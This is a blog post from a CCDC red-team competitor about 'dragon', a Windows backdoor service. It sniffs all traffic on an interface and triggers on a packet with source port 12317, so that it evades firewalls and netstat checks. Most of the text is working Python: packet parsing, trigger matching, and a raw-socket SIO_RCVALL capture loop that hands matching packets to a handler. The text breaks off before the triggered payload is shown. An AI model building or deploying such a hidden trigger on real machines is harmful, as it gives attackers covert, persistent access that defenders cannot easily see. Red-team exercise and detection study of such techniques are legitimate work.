In my many years of participating in CCDC, I keep running into the same problem. If you've red teamed for one of these events, I'm sure you've encountered similar issues. You've gotten a shell on a system, and you've even installed a backdoor, either through a bind listener or through a reverse connection that calls back periodically. However, savvy blue teams will either kill your connection with new firewall rules or identify your backdoor through netstat and kill the process.

I've grown so frustrated with losing my shells that I decided to write (okay, mostly steal and modify) a new backdoor specifically for Windows. I noticed that since the teams are scored for having their services up and running, they will never (in their right mind) firewall off access to the scored service running on their Windows servers. However, since the victim's system is already running that service on the non-firewalled port, I couldn't just bind my listener to the same port.

So, instead of binding a socket to that interface/port, what if we put the interface into promiscuous mode and sniff all of the traffic crossing the machine? A sniffer sees every packet whether or not any process has the port bound, so the legitimate service keeps answering as normal and nothing new shows up in netstat. We can then check every passing packet against a specific trigger, and if a packet matches our rule set, we run our backdoor code.

To that end, I wrote an app called dragon. Dragon is a Windows app that is designed to be installed as a Windows service and runs at boot. It listens on the first interface available to the OS (note: if you have multiple interfaces, it will only listen on the first one, so a trigger sent to a different interface is never seen). It continuously captures all traffic on that interface and discards ALL packets it's not interested in.
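To make the "discard everything you're not interested in" step concrete, here is the filter half of that design as an added example. This is not dragon's source and the post does not show how dragon captures packets, so the Windows capture loop at the bottom uses a raw socket with SIO_RCVALL as an assumption about the capture mechanism; the parsing, the trigger rule, the `build_frame` test-traffic helper and the sample addresses are all constructed for this example. The rule is the one the post describes: fire when the packet's source port is 12317, checked here for both TCP and UDP since the post does not name a protocol.

```python
"""Sniff-and-match filter for a trigger-based backdoor (added example, not dragon's code)."""
import socket
import struct
from dataclasses import dataclass
from typing import Callable, List, Optional

TRIGGER_SPORT = 12317            # the trigger source port named in the post
ETHERTYPE_IPV4, ETHERTYPE_VLAN = 0x0800, 0x8100
IPPROTO_TCP, IPPROTO_UDP = 6, 17


@dataclass
class Packet:
    src_ip: str
    dst_ip: str
    proto: int
    sport: int
    dport: int
    payload: bytes


def parse_ipv4(data: bytes) -> Optional[Packet]:
    """Parse an IPv4 packet carrying TCP or UDP; anything else returns None.

    None is the "not interested" path: non-IPv4, other protocols, truncated
    headers, and non-first fragments (which carry no transport header at all).
    """
    if len(data) < 20 or data[0] >> 4 != 4:
        return None
    ihl = (data[0] & 0x0F) * 4
    if ihl < 20 or len(data) < ihl:
        return None
    _, _, total_len, _, frag, _, proto, _, src, dst = struct.unpack("!BBHHHBBH4s4s", data[:20])
    if frag & 0x1FFF or proto not in (IPPROTO_TCP, IPPROTO_UDP):
        return None
    l4 = data[ihl:max(ihl, min(total_len, len(data)))]
    if proto == IPPROTO_TCP:
        if len(l4) < 20:
            return None
        hdr_len = (l4[12] >> 4) * 4           # TCP data offset, in 32-bit words
        if hdr_len < 20 or hdr_len > len(l4):
            return None
    else:
        if len(l4) < 8:
            return None
        hdr_len = 8
    sport, dport = struct.unpack("!HH", l4[:4])
    return Packet(socket.inet_ntoa(src), socket.inet_ntoa(dst), proto, sport, dport, l4[hdr_len:])


def parse_ethernet(frame: bytes) -> Optional[Packet]:
    """Strip an Ethernet II header (and one 802.1Q tag, if present) and parse the IPv4 inside."""
    if len(frame) < 14:
        return None
    ethertype, offset = struct.unpack("!H", frame[12:14])[0], 14
    if ethertype == ETHERTYPE_VLAN:
        if len(frame) < 18:
            return None
        ethertype, offset = struct.unpack("!H", frame[16:18])[0], 18
    if ethertype != ETHERTYPE_IPV4:
        return None
    return parse_ipv4(frame[offset:])


def trigger_matches(pkt: Optional[Packet], sport: int = TRIGGER_SPORT) -> bool:
    """The post's rule: fire only when the packet's SOURCE port equals the trigger."""
    return pkt is not None and pkt.sport == sport


def filter_frames(frames: List[bytes], sport: int = TRIGGER_SPORT) -> List[Packet]:
    """Run a batch of captured Ethernet frames through the rule and keep only the hits."""
    return [p for p in map(parse_ethernet, frames) if trigger_matches(p, sport)]


def build_frame(proto: int, src_ip: str, dst_ip: str, sport: int, dport: int,
                payload: bytes = b"") -> bytes:
    """Constructed test traffic (checksums left at zero): Ethernet + IPv4 + TCP/UDP."""
    if proto == IPPROTO_TCP:
        l4 = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x02, 8192, 0, 0)  # SYN
    else:
        l4 = struct.pack("!HHHH", sport, dport, 8 + len(payload), 0)
    l4 += payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(l4), 0, 0x4000, 64, proto, 0,
                     socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    eth = bytes.fromhex("001122334455") + bytes.fromhex("66778899aabb") + struct.pack("!H", ETHERTYPE_IPV4)
    return eth + ip + l4


def capture_loop(local_ip: str, on_trigger: Callable[[Packet], None], sport: int = TRIGGER_SPORT) -> None:
    """Windows-only, needs admin: receive every IPv4 packet on the interface that owns local_ip.

    ASSUMPTION: SIO_RCVALL stands in for whatever capture method dragon really uses.
    The raw socket hands back IP packets with no Ethernet header, so they go straight
    to parse_ipv4. Everything that does not match the rule is silently dropped.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_IP)
    s.bind((local_ip, 0))
    s.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)   # all packets, not just ones for our socket
    try:
        while True:
            pkt = parse_ipv4(s.recv(65535))
            if trigger_matches(pkt, sport):
                on_trigger(pkt)
    finally:
        s.ioctl(socket.SIO_RCVALL, socket.RCVALL_OFF)
```

Two things worth noticing when you run it: a packet whose destination port is 12317 does not fire, only a source port of 12317 does, and the match ignores the payload entirely, so anyone (or any client whose OS happens to pick 12317 as an ephemeral port) can pull the trigger. That is the trade-off of a port-only rule: it is trivial to send from any client, which is exactly what you want during an event, at the cost of being easy to fire by accident.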

If a packet comes in with a source port of 12317, it will execute the following: